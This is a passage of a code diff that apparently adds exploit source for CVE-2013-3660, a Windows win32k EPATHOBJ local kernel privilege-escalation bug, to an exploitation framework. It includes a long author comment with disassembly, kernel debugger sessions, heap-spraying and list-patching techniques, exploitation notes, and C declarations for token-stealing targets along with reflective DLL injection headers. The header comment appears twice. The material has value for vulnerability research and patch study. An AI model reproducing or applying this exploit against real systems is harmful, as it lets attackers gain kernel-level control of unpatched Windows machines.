+//   Probably caused by : win32k.sys ( win32k!EPATHOBJ::pprFlattenRec+82 )
+//
+//   Followup: MachineOwner
+//   ---------
+//
+//   nt!RtlpBreakWithStatusInstruction:
+//   810f46f4 cc              int     3
+//   kd> kv
+//   ChildEBP RetAddr  Args to Child
+//   a03ab494 8111c87d 00000003 c17b60e1 cccccccc nt!RtlpBreakWithStatusInstruction (FPO: [1,0,0])
+//   a03ab4e4 8111c119 00000003 817d5340 a03ab8e4 nt!KiBugCheckDebugBreak+0x1c (FPO: [Non-Fpo])
+//   a03ab8b8 810f30ba 00000050 cccccccc 00000001 nt!KeBugCheck2+0x655 (FPO: [6,239,4])
+//   a03ab8dc 810f2ff1 00000050 cccccccc 00000001 nt!KiBugCheck2+0xc6
+//   a03ab8fc 811a2816 00000050 cccccccc 00000001 nt!KeBugCheckEx+0x19
+//   a03ab94c 810896cf 00000001 cccccccc a03aba2c nt! ?? ::FNODOBFM::`string'+0x31868
+//   a03aba14 8116c4e4 00000001 cccccccc 00000000 nt!MmAccessFault+0x42d (FPO: [4,37,4])
+//   a03aba14 8f18972e 00000001 cccccccc 00000000 nt!KiTrap0E+0xdc (FPO: [0,0] TrapFrame @ a03aba2c)
+//   a03abbac 8f103c28 0124eba0 a03abbd8 8f248f79 win32k!EPATHOBJ::pprFlattenRec+0x82 (FPO: [Non-Fpo])
+//   a03abbb8 8f248f79 1c010779 0016fd04 8f248f18 win32k!EPATHOBJ::bFlatten+0x1f (FPO: [0,1,0])
+//   a03abc08 8116918c 1c010779 0016fd18 776d7174 win32k!NtGdiFlattenPath+0x61 (FPO: [1,15,4])
+//   a03abc08 776d7174 1c010779 0016fd18 776d7174 nt!KiFastCallEntry+0x12c (FPO: [0,3] TrapFrame @ a03abc14)
+//   0016fcf4 76b1552b 0124147f 1c010779 00000040 ntdll!KiFastSystemCallRet (FPO: [0,0,0])
+//   0016fcf8 0124147f 1c010779 00000040 00000000 GDI32!NtGdiFlattenPath+0xa (FPO: [1,0,0])
+//   WARNING: Stack unwind information not available. Following frames may be wrong.
+//   0016fd18 01241ade 00000001 00202b50 00202ec8 ComplexPath+0x147f
+//   0016fd60 76ee1866 7f0de000 0016fdb0 77716911 ComplexPath+0x1ade
+//   0016fd6c 77716911 7f0de000 bc1d7832 00000000 KERNEL32!BaseThreadInitThunk+0xe (FPO: [Non-Fpo])
+//   0016fdb0 777168bd ffffffff 7778560a 00000000 ntdll!__RtlUserThreadStart+0x4a (FPO: [SEH])
+//   0016fdc0 00000000 01241b5b 7f0de000 00000000 ntdll!_RtlUserThreadStart+0x1c (FPO: [Non-Fpo])
+//   kd> .trap a03aba2c
+//   ErrCode = 00000002
+//   eax=cccccccc ebx=80206014 ecx=80206008 edx=85ae1224 esi=0124eba0 edi=a03abbd8
+//   eip=8f18972e esp=a03abaa0 ebp=a03abbac iopl=0         nv up ei ng nz na pe nc
+//   cs=0008  ss=0010  ds=0023  es=0023  fs=0030  gs=0000             efl=00010286
+//   win32k!EPATHOBJ::pprFlattenRec+0x82:
+//   8f18972e 8918            mov     dword ptr [eax],ebx  ds:0023:cccccccc=????????
+//   kd> vertarget
+//   Windows 8 Kernel Version 9200 MP (1 procs) Free x86 compatible
+//   Product: WinNt, suite: TerminalServer SingleUserTS
+//   Built by: 9200.16581.x86fre.win8_gdr.130410-1505
+//   Machine Name:
+//   Kernel base = 0x81010000 PsLoadedModuleList = 0x811fde48
+//   Debug session time: Mon May 20 14:17:20.259 2013 (UTC - 7:00)
+//   System Uptime: 0 days 0:02:30.432
+//   kd> .bugcheck
+//   Bugcheck code 00000050
+//   Arguments cccccccc 00000001 8f18972e 00000002
+//
+// EXPLOITATION
+//
+// We're somewhat limited with what we can do, as we don't control what's
+// written, it's always a pointer to a PATHRECORD object. We can clobber a
+// function pointer, but the problem is making it point somewhere useful.
+//
+// The solution is to make the Next pointer a valid sequence of instructions,
+// which jumps to our second stage payload. We have to do that in just 4 bytes
+// (unless you can find a better call site, let me know if you spot one).
+//
+// Thanks to progmboy for coming up with the solution: you reach back up the
+// stack and pull a SystemCall parameter out of the stack. It turns out
+// NtQueryIntervalProfile matches this requirement perfectly.
+//
+// INSTRUCTIONS
+//
+// C:\> cl ComplexPath.c
+// C:\> ComplexPath
+//
+// You might need to run it several times before we get the allocation we need,
+// it won't crash if it doesn't work, so you can keep trying. I'm not sure how
+// to improve that.
+//
+// CREDIT
+//
+// Tavis Ormandy <taviso@cmpxchg8b.com>
+// progmboy <programmeboy@gmail.com>
+//
+
+#ifndef WIN32_NO_STATUS
+# define WIN32_NO_STATUS
+#endif
+#include <stdio.h>
+#include <stdarg.h>
+#include <stddef.h>
+#include <windows.h>
+#include <assert.h>
+#ifdef WIN32_NO_STATUS
+# undef WIN32_NO_STATUS
+#endif
+#include <ntstatus.h>
+
+#pragma comment(lib, "gdi32")
+#pragma comment(lib, "kernel32")
+#pragma comment(lib, "user32")
+#pragma comment(lib, "shell32")
+#pragma comment(linker, "/SECTION:.text,ERW")
+
+#ifndef PAGE_SIZE
+# define PAGE_SIZE 0x1000
+#endif
+
+#define MAX_POLYPOINTS (8192 * 3)
+#define MAX_REGIONS 8192
+#define CYCLE_TIMEOUT 10000
+
+static POINT       Points[MAX_POLYPOINTS];
+static BYTE        PointTypes[MAX_POLYPOINTS];
+static HRGN        Regions[MAX_REGIONS];
+static ULONG       ComplexPathNumRegion = 0;
+static HANDLE      Mutex;
+static DWORD       ComplexPathFinished = 0;
+
+// Log levels.
+typedef enum { L_DEBUG, L_INFO, L_WARN, L_ERROR } LEVEL, *PLEVEL;
+
+BOOL LogMessage(LEVEL Level, PCHAR Format, ...);
+
+// Copied from winddi.h from the DDK
+#define PD_BEGINSUBPATH   0x00000001
+#define PD_ENDSUBPATH     0x00000002
+#define PD_RESETSTYLE     0x00000004
+#define PD_CLOSEFIGURE    0x00000008
+#define PD_BEZIERS        0x00000010
+
+typedef struct  _POINTFIX
+{
+    ULONG x;
+    ULONG y;
+} POINTFIX, *PPOINTFIX;
+
+// Approximated from reverse engineering.
+typedef struct _PATHRECORD {
+    struct _PATHRECORD *next;
+    struct _PATHRECORD *prev;
+    ULONG               flags;
+    ULONG               count;
+    POINTFIX            points[4];
+} PATHRECORD, *PPATHRECORD;
+
+PPATHRECORD PathRecord;
+PATHRECORD  ExploitRecord;
+PPATHRECORD ExploitRecordExit;
+
+enum { SystemModuleInformation = 11 };
+enum { ProfileTotalIssues = 2 };
+
+typedef struct _RTL_PROCESS_MODULE_INFORMATION {
+    HANDLE Section;
+    PVOID MappedBase;
+    PVOID ImageBase;
+    ULONG ImageSize;
+    ULONG Flags;
+    USHORT LoadOrderIndex;
+    USHORT InitOrderIndex;
+    USHORT LoadCount;
+    USHORT OffsetToFileName;
+    UCHAR  FullPathName[256];
+} RTL_PROCESS_MODULE_INFORMATION, *PRTL_PROCESS_MODULE_INFORMATION;
+
+typedef struct _RTL_PROCESS_MODULES {
+    ULONG NumberOfModules;
+    RTL_PROCESS_MODULE_INFORMATION Modules[1];
+} RTL_PROCESS_MODULES, *PRTL_PROCESS_MODULES;
+
+FARPROC NtQuerySystemInformation;
+FARPROC NtQueryIntervalProfile;
+FARPROC PsReferencePrimaryToken;
+FARPROC PsLookupProcessByProcessId;
+PULONG  HalDispatchTable;
+ULONG   HalQuerySystemInformation;
+PULONG  TargetPid;
+PVOID  *PsInitialSystemProcess;
+
+VOID elevator_complex_path();
+
+//#define DEBUGTRACE 1
+
+#ifdef DEBUGTRACE
+#define dprintf(...) real_dprintf(__VA_ARGS__)
+#else
+#define dprintf(...) do{}while(0);
+#endif
+
+static void real_dprintf(char *format, ...) {
+	va_list args;
+	char buffer[1024];
+	va_start(args,format);
+	vsnprintf_s(buffer, sizeof(buffer), sizeof(buffer)-3, format,args);
+	strcat_s(buffer, sizeof(buffer), "\r\n");
+	OutputDebugStringA(buffer);
+}
\ No newline at end of file
diff --git a/external/source/exploits/cve-2013-3660/dll/src/ReflectiveDLLInjection.h b/external/source/exploits/cve-2013-3660/dll/src/ReflectiveDLLInjection.h
new file mode 100755
index 0000000000..5738497f5b
--- /dev/null
+++ b/external/source/exploits/cve-2013-3660/dll/src/ReflectiveDLLInjection.h
@@ -0,0 +1,51 @@
+//===============================================================================================//
+// Copyright (c) 2012, Stephen Fewer of Harmony Security (www.harmonysecurity.com)
+// All rights reserved.
+// 
+// Redistribution and use in source and binary forms, with or without modification, are permitted 
+// provided that the following conditions are met:
+// 
+//     * Redistributions of source code must retain the above copyright notice, this list of 
+// conditions and the following disclaimer.
+// 
+//     * Redistributions in binary form must reproduce the above copyright notice, this list of 
+// conditions and the following disclaimer in the documentation and/or other materials provided 
+// with the distribution.
+// 
+//     * Neither the name of Harmony Security nor the names of its contributors may be used to
+// endorse or promote products derived from this software without specific prior written permission.
+// 
+// THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND ANY EXPRESS OR 
+// IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND
+// FITNESS FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR 
+// CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR 
+// CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR 
+// SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY 
+// THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR 
+// OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE 
+// POSSIBILITY OF SUCH DAMAGE.
+//===============================================================================================//
+#ifndef _REFLECTIVEDLLINJECTION_REFLECTIVEDLLINJECTION_H
+#define _REFLECTIVEDLLINJECTION_REFLECTIVEDLLINJECTION_H
+//===============================================================================================//
+#define WIN32_LEAN_AND_MEAN
+#include <windows.h>
+
+// we declare some common stuff in here...
+
+#define DLL_QUERY_HMODULE		6
+
+#define DEREF( name )*(UINT_PTR *)(name)
+#define DEREF_64( name )*(DWORD64 *)(name)
+#define DEREF_32( name )*(DWORD *)(name)
+#define DEREF_16( name )*(WORD *)(name)
+#define DEREF_8( name )*(BYTE *)(name)
+
+typedef DWORD (WINAPI * REFLECTIVELOADER)( VOID );
+typedef BOOL (WINAPI * DLLMAIN)( HINSTANCE, DWORD, LPVOID );
+
+#define DLLEXPORT   __declspec( dllexport ) 
+
+//===============================================================================================//
+#endif
+//===============================================================================================//
diff --git a/external/source/exploits/cve-2013-3660/dll/src/ReflectiveDll.c b/external/source/exploits/cve-2013-3660/dll/src/ReflectiveDll.c
new file mode 100755
index 0000000000..c8912a9e9d
--- /dev/null
+++ b/external/source/exploits/cve-2013-3660/dll/src/ReflectiveDll.c
@@ -0,0 +1,810 @@
+//===============================================================================================//
+// This is a stub for the actuall functionality of the DLL.
+//===============================================================================================//
+
+// Note: REFLECTIVEDLLINJECTION_VIA_LOADREMOTELIBRARYR and REFLECTIVEDLLINJECTION_CUSTOM_DLLMAIN are
+// defined in the project properties (Properties->C++->Preprocessor) so as we can specify our own 
+// DllMain and use the LoadRemoteLibraryR() API to inject this DLL.
+//===============================================================================================//
+
+#include "ReflectiveLoader.h"
+#include "ComplexPath.h"
+
+//
+// --------------------------------------------------
+// Windows NT/2K/XP/2K3/VISTA/2K8/7/8 EPATHOBJ local ring0 exploit
+// ----------------------------------------- taviso@cmpxchg8b.com -----
+//
+// INTRODUCTION
+//
+// There's a pretty obvious bug in win32k!EPATHOBJ::pprFlattenRec where the
+// PATHREC object returned by win32k!EPATHOBJ::newpathrec doesn't initialise the
+// next list pointer. The bug is really nice, but exploitation when
+// allocations start failing is tricky.
+//
+// ; BOOL __thiscall EPATHOBJ::newpathrec(EPATHOBJ     *this,
+//                                        PATHRECORD   **pppr,
+//                                        ULONG         *pcMax,
+//                                        ULONG cNeeded)
+//  .text:BFA122CA                 mov     esi, [ebp+ppr]
+//  .text:BFA122CD                 mov     eax, [esi+PATHRECORD.pprPrev]
+//  .text:BFA122D0                 push    edi
+//  .text:BFA122D1                 mov     edi, [ebp+pprNew]
+//  .text:BFA122D4                 mov     [edi+PATHRECORD.pprPrev], eax
+//  .text:BFA122D7                 lea     eax, [edi+PATHRECORD.count]
+//  .text:BFA122DA                 xor     edx, edx
+//  .text:BFA122DC                 mov     [eax], edx
+//  .text:BFA122DE                 mov     ecx, [esi+PATHRECORD.flags]
+//  .text:BFA122E1                 and     ecx, not (PD_BEZIER)
+//  .text:BFA122E4                 mov     [edi+PATHRECORD.flags], ecx 
+//  .text:BFA122E7                 mov     [ebp+pprNewCountPtr], eax
+//  .text:BFA122EA                 cmp     [edi+PATHRECORD.pprPrev], edx
+//  .text:BFA122ED                 jnz     short loc_BFA122F7
+//  .text:BFA122EF                 mov     ecx, [ebx+EPATHOBJ.ppath]
+//  .text:BFA122F2                 mov     [ecx+PATHOBJ.pprfirst], edi
+//
+//  It turns out this mostly works because newpathrec() is backed by newpathalloc()
+//  which uses PALLOCMEM(). PALLOCMEM() will always zero the buffer returned.
+//
+//  ; PVOID __stdcall PALLOCMEM(size_t size, int tag)
+//  .text:BF9160D7                 xor     esi, esi
+//  .text:BF9160DE                 push    esi
+//  .text:BF9160DF                 push    esi
+//  .text:BF9160E0                 push    [ebp+tag]
+//  .text:BF9160E3                 push    [ebp+size]
+//  .text:BF9160E6                 call    _HeavyAllocPool@16 ; HeavyAllocPool(x,x,x,x)
+//  .text:BF9160EB                 mov     esi, eax
+//  .text:BF9160ED                 test    esi, esi
+//  .text:BF9160EF                 jz      short loc_BF9160FF
+//  .text:BF9160F1                 push    [ebp+size]      ; size_t
+//  .text:BF9160F4                 push    0               ; int
+//  .text:BF9160F6                 push    esi             ; void *
+//  .text:BF9160F7                 call    _memset
+//
+//  However, the PATHALLOC allocator includes it's own freelist implementation, and
+//  if that codepath can satisfy a request the memory isn't zeroed and returned
+//  directly to the caller. This effectively means that we can add our own objects
+//  to the PATHRECORD chain.
+//
+//  We can force this behaviour under memory pressure relatively easily, I just
+//  spam HRGN objects until they start failing. This isn't super reliable, but it's
+//  good enough for testing.
+//
+//          // I don't use the simpler CreateRectRgn() because it leaks a GDI handle on
+//          // failure. Seriously, do some damn QA Microsoft, wtf.
+//          for (Size = 1 << 26; Size; Size >>= 1) {
+//              while (CreateRoundRectRgn(0, 0, 1, Size, 1, 1))
+//                  ;
+//          }
+//
+//  Adding user controlled blocks to the freelist is a little trickier, but I've
+//  found that flattening large lists of bezier curves added with PolyDraw() can
+//  accomplish this reliably. The code to do this is something along the lines of:
+//
+//          for (PointNum = 0; PointNum < MAX_POLYPOINTS; PointNum++) {
+//              Points[PointNum].x      = 0x41414141 >> 4;
+//              Points[PointNum].y      = 0x41414141 >> 4;
+//              PointTypes[PointNum]    = PT_BEZIERTO;
+//          }
+//
+//          for (PointNum = MAX_POLYPOINTS; PointNum; PointNum -= 3) {
+//              BeginPath(Device);
+//              PolyDraw(Device, Points, PointTypes, PointNum);
+//              EndPath(Device);
+//              FlattenPath(Device);
+//              FlattenPath(Device);
+//              EndPath(Device);
+//          }
+//
+//   We can verify this is working by putting a breakpoint after newpathrec, and
+//   verifying the buffer is filled with recognisable values when it returns:
+//
+//   kd> u win32k!EPATHOBJ::pprFlattenRec+1E
+//   win32k!EPATHOBJ::pprFlattenRec+0x1e:
+//   95c922b8 e8acfbffff      call    win32k!EPATHOBJ::newpathrec (95c91e69)
+//   95c922bd 83f801          cmp     eax,1
+//   95c922c0 7407            je      win32k!EPATHOBJ::pprFlattenRec+0x2f (95c922c9)
+//   95c922c2 33c0            xor     eax,eax
+//   95c922c4 e944020000      jmp     win32k!EPATHOBJ::pprFlattenRec+0x273 (95c9250d)
+//   95c922c9 56              push    esi
+//   95c922ca 8b7508          mov     esi,dword ptr [ebp+8]
+//   95c922cd 8b4604          mov     eax,dword ptr [esi+4]
+//   kd> ba e 1 win32k!EPATHOBJ::pprFlattenRec+23 "dd poi(ebp-4) L1; gc"
+//   kd> g
+//   fe938fac  41414140
+//   fe938fac  41414140
+//   fe938fac  41414140
+//   fe938fac  41414140
+//   fe938fac  41414140
+//
+//   The breakpoint dumps the first dword of the returned buffer, which matches the
+//   bezier points set with PolyDraw(). So convincing pprFlattenRec() to move
+//   EPATHOBJ->records->head->next->next into userspace is no problem, and we can
+//   easily break the list traversal in bFlattten():
+//
+//   BOOL __thiscall EPATHOBJ::bFlatten(EPATHOBJ *this)
+//   {
+//     EPATHOBJ *pathobj; // esi@1
+//     PATHOBJ *ppath; // eax@1
+//     BOOL result; // eax@2
+//     PATHRECORD *ppr; // eax@3
+//
+//     pathobj = this;
+//     ppath = this->ppath;
+//     if ( ppath )
+//     {
+//       for ( ppr = ppath->pprfirst; ppr; ppr = ppr->pprnext )
+//       {
+//         if ( ppr->flags & PD_BEZIER )
+//         {
+//           ppr = EPATHOBJ::pprFlattenRec(pathobj, ppr);
+//           if ( !ppr )
+//             goto LABEL_2;
+//         }
+//       }
+//       pathobj->fl &= 0xFFFFFFFE;
+//       result = 1;
+//     }
+//     else
+//     {
+//   LABEL_2:
+//       result = 0;
+//     }
+//     return result;
+//   }
+//
+//   All we have to do is allocate our own PATHRECORD structure, and then spam
+//   PolyDraw() with POINTFIX structures containing co-ordinates that are actually
+//   pointers shifted right by 4 (for this reason the structure must be aligned so
+//   the bits shifted out are all zero).
+//
+//   We can see this in action by putting a breakpoint in bFlatten when ppr has
+//   moved into userspace:
+//
+//   kd> u win32k!EPATHOBJ::bFlatten
+//   win32k!EPATHOBJ::bFlatten:
+//   95c92517 8bff            mov     edi,edi
+//   95c92519 56              push    esi
+//   95c9251a 8bf1            mov     esi,ecx
+//   95c9251c 8b4608          mov     eax,dword ptr [esi+8]
+//   95c9251f 85c0            test    eax,eax
+//   95c92521 7504            jne     win32k!EPATHOBJ::bFlatten+0x10 (95c92527)
+//   95c92523 33c0            xor     eax,eax
+//   95c92525 5e              pop     esi
+//   kd> u
+//   win32k!EPATHOBJ::bFlatten+0xf:
+//   95c92526 c3              ret
+//   95c92527 8b4014          mov     eax,dword ptr [eax+14h]
+//   95c9252a eb14            jmp     win32k!EPATHOBJ::bFlatten+0x29 (95c92540)
+//   95c9252c f6400810        test    byte ptr [eax+8],10h
+//   95c92530 740c            je      win32k!EPATHOBJ::bFlatten+0x27 (95c9253e)
+//   95c92532 50              push    eax
+//   95c92533 8bce            mov     ecx,esi
+//   95c92535 e860fdffff      call    win32k!EPATHOBJ::pprFlattenRec (95c9229a)
+//
+//   So at 95c9252c eax is ppr->next, and the routine checks for the PD_BEZIERS
+//   flags (defined in winddi.h). Let's break if it's in userspace:
+//
+//   kd> ba e 1 95c9252c "j (eax < poi(nt!MmUserProbeAddress)) 'gc'; ''"
+//   kd> g
+//   95c9252c f6400810        test    byte ptr [eax+8],10h
+//   kd> r
+//   eax=41414140 ebx=95c1017e ecx=97330bec edx=00000001 esi=97330bec edi=0701062d
+//   eip=95c9252c esp=97330be4 ebp=97330c28 iopl=0         nv up ei pl nz na po nc
+//   cs=0008  ss=0010  ds=0023  es=0023  fs=0030  gs=0000             efl=00010202
+//   win32k!EPATHOBJ::bFlatten+0x15:
+//   95c9252c f6400810        test    byte ptr [eax+8],10h       ds:0023:41414148=??
+//
+//   The question is how to turn that into code execution? It's obviously trivial to
+//   call prFlattenRec with our userspace PATHRECORD..we can do that by setting
+//   PD_BEZIER in our userspace PATHRECORD, but the early exit on allocation failure
+//   poses a problem.
+//
+//   Let me demonstrate calling it with my own PATHRECORD:
+//
+//       // Create our PATHRECORD in userspace we will get added to the EPATHOBJ
+//       // pathrecord chain.
+//       PathRecord = VirtualAlloc(NULL,
+//                                 sizeof(PATHRECORD),
+//                                 MEM_COMMIT | MEM_RESERVE,
+//                                 PAGE_EXECUTE_READWRITE);
+//
+//       // Initialise with recognisable debugging values.
+//       FillMemory(PathRecord, sizeof(PATHRECORD), 0xCC);
+//
+//       PathRecord->next    = (PVOID)(0x41414141);
+//       PathRecord->prev    = (PVOID)(0x42424242);
+//
+//       // You need the PD_BEZIERS flag to enter EPATHOBJ::pprFlattenRec() from
+//       // EPATHOBJ::bFlatten(), do that here.
+//       PathRecord->flags   = PD_BEZIERS;
+//
+//       // Generate a large number of Bezier Curves made up of pointers to our
+//       // PATHRECORD object.
+//       for (PointNum = 0; PointNum < MAX_POLYPOINTS; PointNum++) {
+//           Points[PointNum].x      = (ULONG)(PathRecord) >> 4;
+//           Points[PointNum].y      = (ULONG)(PathRecord) >> 4;
+//           PointTypes[PointNum]    = PT_BEZIERTO;
+//       }
+//
+//   kd> ba e 1 win32k!EPATHOBJ::pprFlattenRec+28 "j (dwo(ebp+8) < dwo(nt!MmUserProbeAddress)) ''; 'gc'"
+//   kd> g
+//   win32k!EPATHOBJ::pprFlattenRec+0x28:
+//   95c922c2 33c0            xor     eax,eax
+//   kd> dd ebp+8 L1
+//   a3633be0  00130000
+//
+//   The ppr object is in userspace! If we peek at it:
+//
+//   kd> dd poi(ebp+8)
+//   00130000  41414141 42424242 00000010 cccccccc
+//   00130010  00000000 00000000 00000000 00000000
+//   00130020  00000000 00000000 00000000 00000000
+//   00130030  00000000 00000000 00000000 00000000
+//   00130040  00000000 00000000 00000000 00000000
+//   00130050  00000000 00000000 00000000 00000000
+//   00130060  00000000 00000000 00000000 00000000
+//   00130070  00000000 00000000 00000000 00000000
+//
+//   There's the next and prev pointer.
+//
+//   kd> kvn
+//    # ChildEBP RetAddr  Args to Child
+//   00 a3633bd8 95c9253a 00130000 002bfea0 95c101ce win32k!EPATHOBJ::pprFlattenRec+0x28 (FPO: [Non-Fpo])
+//   01 a3633be4 95c101ce 00000001 00000294 fe763360 win32k!EPATHOBJ::bFlatten+0x23 (FPO: [0,0,4])
+//   02 a3633c28 829ab173 0701062d 002bfea8 7721a364 win32k!NtGdiFlattenPath+0x50 (FPO: [Non-Fpo])
+//   03 a3633c28 7721a364 0701062d 002bfea8 7721a364 nt!KiFastCallEntry+0x163 (FPO: [0,3] TrapFrame @ a3633c34)
+//
+//   The question is how to get PATHALLOC() to succeed under memory pressure so we
+//   can make this exploitable? I'm quite proud of this list cycle trick,
+//   here's how to turn it into an arbitrary write.
+//
+//   First, we create a watchdog thread that will patch the list atomically
+//   when we're ready. This is needed because we can't exploit the bug while
+//   HeavyAllocPool is failing, because of the early exit in pprFlattenRec:
+//
+//   .text:BFA122B8                 call newpathrec              ; EPATHOBJ::newpathrec(_PATHRECORD * *,ulong *,ulong)
+//   .text:BFA122BD                 cmp     eax, 1               ; Check for failure
+//   .text:BFA122C0                 jz      short continue
+//   .text:BFA122C2                 xor     eax, eax             ; Exit early
+//   .text:BFA122C4                 jmp     early_exit
+//
+//   So we create a list node like this:
+//
+//   PathRecord->Next    = PathRecord;
+//   PathRecord->Flags   = 0;
+//
+//   Then EPATHOBJ::bFlatten() spins forever doing nothing:
+//
+//   BOOL __thiscall EPATHOBJ::bFlatten(EPATHOBJ *this)
+//   {
+//       /* ... */
+//
+//       for ( ppr = ppath->pprfirst; ppr; ppr = ppr->pprnext )
+//       {
+//         if ( ppr->flags & PD_BEZIER )
+//         {
+//           ppr = EPATHOBJ::pprFlattenRec(pathobj, ppr);
+//         }
+//       }
+//
+//       /* ... */
+//   }
+//
+//   While it's spinning, we clean up in another thread, then patch the thread (we
+//   can do this, because it's now in userspace) to trigger the exploit. The first
+//   block of pprFlattenRec does something like this:
+//
+//       if ( pprNew->pprPrev )
+//         pprNew->pprPrev->pprnext = pprNew;
+//
+//   Let's make that write to 0xCCCCCCCC.
+//
+//   DWORD WINAPI WatchdogThread(LPVOID Parameter)
+//   {
+//
+//       // This routine waits for a mutex object to timeout, then patches the
+//       // compromised linked list to point to an exploit. We need to do this.
+//       LogMessage(L_INFO, "Watchdog thread %u waiting on Mutex@%p",
+//                          GetCurrentThreadId(),
+//                          Mutex);
+//
+//       if (WaitForSingleObject(Mutex, CYCLE_TIMEOUT) == WAIT_TIMEOUT) {
+//           // It looks like the main thread is stuck in a call to FlattenPath(),
+//           // because the kernel is spinning in EPATHOBJ::bFlatten(). We can clean
+//           // up, and then patch the list to trigger our exploit.
+//           while (NumRegion--)
+//               DeleteObject(Regions[NumRegion]);
+//
+//           LogMessage(L_ERROR, "InterlockedExchange(%p, %p);", &PathRecord->next, &ExploitRecord);
+//
+//           InterlockedExchangePointer(&PathRecord->next, &ExploitRecord);
+//
+//       } else {
+//           LogMessage(L_ERROR, "Mutex object did not timeout, list not patched");
+//       }
+//
+//       return 0;
+//   }
+//
+//       PathRecord->next    = PathRecord;
+//       PathRecord->prev    = (PVOID)(0x42424242);
+//       PathRecord->flags   = 0;
+//
+//       ExploitRecord.next  = NULL;
+//       ExploitRecord.prev  = 0xCCCCCCCC;
+//       ExploitRecord.flags = PD_BEZIERS;
+//
+//   Here's the output on Windows 8:
+//
+//   kd> g
+//   *******************************************************************************
+//   *                                                                             *
+//   *                        Bugcheck Analysis                                    *
+//   *                                                                             *
+//   *******************************************************************************
+//
+//   Use !analyze -v to get detailed debugging information.
+//
+//   BugCheck 50, {cccccccc, 1, 8f18972e, 2}
+//   *** WARNING: Unable to verify checksum for ComplexPath.exe
+//   *** ERROR: Module load completed but symbols could not be loaded for ComplexPath.exe
+//   Probably caused by : win32k.sys ( win32k!EPATHOBJ::pprFlattenRec+82 )
+//
+//   Followup: MachineOwner
+//   ---------
+//
+//   nt!RtlpBreakWithStatusInstruction:
+//   810f46f4 cc              int     3
+//   kd> kv
+//   ChildEBP RetAddr  Args to Child
+//   a03ab494 8111c87d 00000003 c17b60e1 cccccccc nt!RtlpBreakWithStatusInstruction (FPO: [1,0,0])
+//   a03ab4e4 8111c119 00000003 817d5340 a03ab8e4 nt!KiBugCheckDebugBreak+0x1c (FPO: [Non-Fpo])
+//   a03ab8b8 810f30ba 00000050 cccccccc 00000001 nt!KeBugCheck2+0x655 (FPO: [6,239,4])
+//   a03ab8dc 810f2ff1 00000050 cccccccc 00000001 nt!KiBugCheck2+0xc6
+//   a03ab8fc 811a2816 00000050 cccccccc 00000001 nt!KeBugCheckEx+0x19
+//   a03ab94c 810896cf 00000001 cccccccc a03aba2c nt! ?? ::FNODOBFM::`string'+0x31868
+//   a03aba14 8116c4e4 00000001 cccccccc 00000000 nt!MmAccessFault+0x42d (FPO: [4,37,4])
+//   a03aba14 8f18972e 00000001 cccccccc 00000000 nt!KiTrap0E+0xdc (FPO: [0,0] TrapFrame @ a03aba2c)
+//   a03abbac 8f103c28 0124eba0 a03abbd8 8f248f79 win32k!EPATHOBJ::pprFlattenRec+0x82 (FPO: [Non-Fpo])
+//   a03abbb8 8f248f79 1c010779 0016fd04 8f248f18 win32k!EPATHOBJ::bFlatten+0x1f (FPO: [0,1,0])
+//   a03abc08 8116918c 1c010779 0016fd18 776d7174 win32k!NtGdiFlattenPath+0x61 (FPO: [1,15,4])
+//   a03abc08 776d7174 1c010779 0016fd18 776d7174 nt!KiFastCallEntry+0x12c (FPO: [0,3] TrapFrame @ a03abc14)
+//   0016fcf4 76b1552b 0124147f 1c010779 00000040 ntdll!KiFastSystemCallRet (FPO: [0,0,0])
+//   0016fcf8 0124147f 1c010779 00000040 00000000 GDI32!NtGdiFlattenPath+0xa (FPO: [1,0,0])
+//   WARNING: Stack unwind information not available. Following frames may be wrong.
+//   0016fd18 01241ade 00000001 00202b50 00202ec8 ComplexPath+0x147f
+//   0016fd60 76ee1866 7f0de000 0016fdb0 77716911 ComplexPath+0x1ade
+//   0016fd6c 77716911 7f0de000 bc1d7832 00000000 KERNEL32!BaseThreadInitThunk+0xe (FPO: [Non-Fpo])
+//   0016fdb0 777168bd ffffffff 7778560a 00000000 ntdll!__RtlUserThreadStart+0x4a (FPO: [SEH])
+//   0016fdc0 00000000 01241b5b 7f0de000 00000000 ntdll!_RtlUserThreadStart+0x1c (FPO: [Non-Fpo])
+//   kd> .trap a03aba2c
+//   ErrCode = 00000002
+//   eax=cccccccc ebx=80206014 ecx=80206008 edx=85ae1224 esi=0124eba0 edi=a03abbd8
+//   eip=8f18972e esp=a03abaa0 ebp=a03abbac iopl=0         nv up ei ng nz na pe nc
+//   cs=0008  ss=0010  ds=0023  es=0023  fs=0030  gs=0000             efl=00010286
+//   win32k!EPATHOBJ::pprFlattenRec+0x82:
+//   8f18972e 8918            mov     dword ptr [eax],ebx  ds:0023:cccccccc=????????
+//   kd> vertarget
+//   Windows 8 Kernel Version 9200 MP (1 procs) Free x86 compatible
+//   Product: WinNt, suite: TerminalServer SingleUserTS
+//   Built by: 9200.16581.x86fre.win8_gdr.130410-1505
+//   Machine Name:
+//   Kernel base = 0x81010000 PsLoadedModuleList = 0x811fde48
+//   Debug session time: Mon May 20 14:17:20.259 2013 (UTC - 7:00)
+//   System Uptime: 0 days 0:02:30.432
+//   kd> .bugcheck
+//   Bugcheck code 00000050
+//   Arguments cccccccc 00000001 8f18972e 00000002
+//
+// EXPLOITATION
+//
+// We're somewhat limited with what we can do, as we don't control what's
+// written, it's always a pointer to a PATHRECORD object. We can clobber a
+// function pointer, but the problem is making it point somewhere useful.
+//
+// The solution is to make the Next pointer a valid sequence of instructions,
+// which jumps to our second stage payload. We have to do that in just 4 bytes
+// (unless you can find a better call site, let me know if you spot one).
+//
+// Thanks to progmboy for coming up with the solution: you reach back up the
+// stack and pull a SystemCall parameter out of the stack. It turns out
+// NtQueryIntervalProfile matches this requirement perfectly.
+//
